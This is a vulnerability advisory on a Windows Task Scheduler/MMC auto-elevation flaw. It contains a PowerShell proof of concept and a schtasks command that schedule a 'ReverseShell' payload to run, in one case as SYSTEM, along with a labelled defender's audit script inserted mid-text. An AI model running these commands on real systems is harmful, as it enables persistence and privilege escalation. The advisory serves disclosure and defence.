Microsoft Windows Task Scheduler Local Privilege Escalation

Posted Jul 19, 2019
Authored by Social Engineering Neo

Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI and MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional elevation of privilege.

tags | exploit, local
systems | windows
SHA-256 | 27a3037b9c6d02b2d118a2d8e7f2cadfc535a7b45a10d00413e02cf04227f2c6

Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.


Affected Platforms: -
Microsoft Windows ≤10


Tested On: -
Windows 10 (build 1809, 1903) & Windows 7 SP1.
Tested on the most recent security patch. (July 2019)


Class: -
Improper Authorization - (CWE-285).
Remote Code Execution.


Summary: - The typical computer user can trigger programs at intervals on any account existing on the host system/domain without proper authorization.


Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI; MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC, potentially leading to unintentional EoP.


Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users existing in the 'administrators' group, including administrator accounts.
: - Only the GUI seems to be affected. This is shown with our simple PowerShell script: when you adjust '-Daily -At 9pm' to '-AtLogOn' or '-AtStartUp', additional permissions are required.
: - Whereas the GUI allows "-AtLogOn" without additional permissions.
: - An attacker with the ability to execute 'taskschd.msc' with arguments through the CLI is able to perform this attack with elevated permissions as a payload; therefore exploitability is greatly increased.
: - HIDS/HIPS without specific configurations may not raise such events as alerts or warnings and may simply log the event instead, increasing the chance that a system administrator overlooks the issue.
: - Enterprise/personal systems complying with basic security practices are less likely to be affected; the average computer user with a default system configuration could be vulnerable to such attacks.


Proof of Concept: - (PowerShell)
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

#The above PowerShell script will create a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
#Some additional configuration of the PowerShell may be required.
#We have our own reverse shell payload; it's up to you "the attacker" to create your own payload.
#
#NOTE: Task should run every day at 9pm (system time). You can change this to what suits your needs.
# Task will only have 'user' permissions. This PoC only exists to prove that modifying line 9, col 39 & line 3, col 28 to either "AtLogOn" or "AtStartUp" will result in access denied.
# The GUI is automatically elevated, whereas the CLI is not.
# ***We have later noticed this PoC is essentially the same as running `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"` *additional permissions needed for CLI, not GUI*
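As an added defender's example (not part of the original advisory), the following PowerShell audit lists scheduled tasks outside the OS-owned task folders that run as SYSTEM or with the highest run level, and pulls recent Security event 4698 task-creation records so an administrator can see which account registered each task. The function names and the trusted-path list are assumptions of this example; it needs the ScheduledTasks module (Windows 8 / Server 2012 and later).

```powershell
Import-Module ScheduledTasks -ErrorAction Stop   # Windows 8 / Server 2012 and later

function Get-ElevatedUserTask {
    # Tasks that run as SYSTEM or with RunLevel 'Highest' outside OS-owned folders.
    param([string[]] $TrustedPaths = @('\Microsoft\'))   # folders excluded from review (assumed list)
    Get-ScheduledTask | Where-Object {
        $p = $_.Principal
        $elevated = ($p.UserId -match '^(NT AUTHORITY\\)?SYSTEM$') -or
                    ($p.UserId -eq 'S-1-5-18') -or ($p.RunLevel -eq 'Highest')
        $trusted = $false
        foreach ($tp in $TrustedPaths) { if ($_.TaskPath -like "$tp*") { $trusted = $true } }
        $elevated -and -not $trusted
    } | ForEach-Object {
        $info = $_ | Get-ScheduledTaskInfo
        [pscustomobject]@{
            TaskPath    = $_.TaskPath + $_.TaskName
            Author      = $_.Author
            RunAs       = $_.Principal.UserId
            RunLevel    = $_.Principal.RunLevel
            Action      = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
            Triggers    = ($_.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ', '
            LastRunTime = $info.LastRunTime
        }
    }
}

function Get-TaskCreationEvent {
    # Security event 4698 ("A scheduled task was created") records who registered a task and
    # the task XML; it is only logged when 'Audit Other Object Access Events' is enabled.
    param([int] $Days = 7)
    $filter = @{ LogName = 'Security'; Id = 4698; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $data = @{}
        foreach ($d in ([xml] $_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $task = [xml] $data['TaskContent']
        [pscustomobject]@{
            Time      = $_.TimeCreated
            CreatedBy = '{0}\{1}' -f $data['SubjectDomainName'], $data['SubjectUserName']
            TaskName  = $data['TaskName']
            RunsAs    = $task.Task.Principals.Principal.UserId
        }
    }
}

# Review both views together: a SYSTEM task registered by an ordinary user account is the
# pattern this advisory describes and is worth a closer look.
Get-ElevatedUserTask  | Sort-Object TaskPath | Format-Table -AutoSize
Get-TaskCreationEvent | Sort-Object Time     | Format-Table -AutoSize
```

If event 4698 returns nothing, the audit subcategory is off on that host; the task listing still works without it.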


VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
: - https://youtu.be/_leFNyo5wxM **original**


Expected Result: -
Normal users should not be able to run tasks as other users and execute programs on accounts without proper authorization.


Observed Result: -
Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromise.


Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems being affected with this issue.
Microsoft should prevent the Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this because most "average" users will not understand how they can be affected by attacks such as this.
Proper access control implementations will greatly reduce risk towards enterprise systems.


NVD CVSS v3 Vector: -
AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:W/RC:R/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7


NVD CVSS v2 Vector: -
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:W/RC:UR/CDP:MH/TD:M/CR:L/IR:L/AR:L)

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8


MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8


TIMELINE: - Discovery 5th July 2019
: - Initial Report 5th July 2019
: - Case Opened 8th July 2019
: - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019
: - Case Closed 9th July 2019
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)

: - We thank the MSRC team for their quick response.